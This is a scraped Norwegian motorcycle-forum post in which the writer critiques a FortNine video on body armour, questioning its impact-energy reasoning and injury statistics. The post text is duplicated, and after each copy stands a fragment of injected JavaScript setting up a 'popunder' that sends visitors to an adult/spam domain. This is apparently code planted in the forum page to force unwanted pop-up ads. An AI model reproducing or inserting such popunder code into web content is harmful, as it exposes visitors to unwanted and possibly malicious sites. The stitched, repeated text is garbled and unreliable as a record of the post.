FortNine - Why I Stopped Wearing Motorcycle Body Armour (og litt bobil)
Lagt inn: 04 apr 2024, 08:18
Interessant selv om lar beskyttelsen bli i jakka, er ikke svart/hvitt dette, for meg handler det om å bedre oddsene, ikke fullstendig eliminere risikoen, da må jeg parkere MCen. Er vel en praktisk greie også, beskyttelsene er jo litt småklumpete som det er, om beskyttelsen blir større blir det veldig klumpete og komfort påvirker også sikkerhet.
Stusser litt på logikken for argumentasjonen også, at 9kJ er for mye fordi bein brekker ved 4kJ. Men det er jo bare energien for testloddet for valgt vekt og valgt høyde. Eller oversatt til landeveien, crash ved gitt hastighet (litt forenklet, en rekke andre faktorer også) selv om da må huske at energien øker med kvadratet av hastigheten.
Så mao., vil hindre brudd (eller andre skader) opp til gitt hastighet men ikke over. Og opplagt bra at level 2 reduserer energien fra 50kJ til 9kJ, altså tar ut mer enn 80% av energien.
Også usikker på om statistikken refereres til er litt for enkel, når hevder at ikke flere bruddskader hos de som kjører uten beskyttelse, kan det være fordi de som kjører uten beskyttelse kjører mer forsiktig f.eks.? Statistikk er skumle greier hvor ofte enkelt å få det svaret ønsker...
Men likevel grei bakgrunnsinfo greit å kjenne til og litt annen vikling enn den "vanlige".
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
(sorry om allerede postet)
Stusser litt på logikken for argumentasjonen også, at 9kJ er for mye fordi bein brekker ved 4kJ. Men det er jo bare energien for testloddet for valgt vekt og valgt høyde. Eller oversatt til landeveien, crash ved gitt hastighet (litt forenklet, en rekke andre faktorer også) selv om da må huske at energien øker med kvadratet av hastigheten.
Så mao., vil hindre brudd (eller andre skader) opp til gitt hastighet men ikke over. Og opplagt bra at level 2 reduserer energien fra 50kJ til 9kJ, altså tar ut mer enn 80% av energien.
Også usikker på om statistikken refereres til er litt for enkel, når hevder at ikke flere bruddskader hos de som kjører uten beskyttelse, kan det være fordi de som kjører uten beskyttelse kjører mer forsiktig f.eks.? Statistikk er skumle greier hvor ofte enkelt å få det svaret ønsker...
Men likevel grei bakgrunnsinfo greit å kjenne til og litt annen vikling enn den "vanlige".
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
(sorry om allerede postet)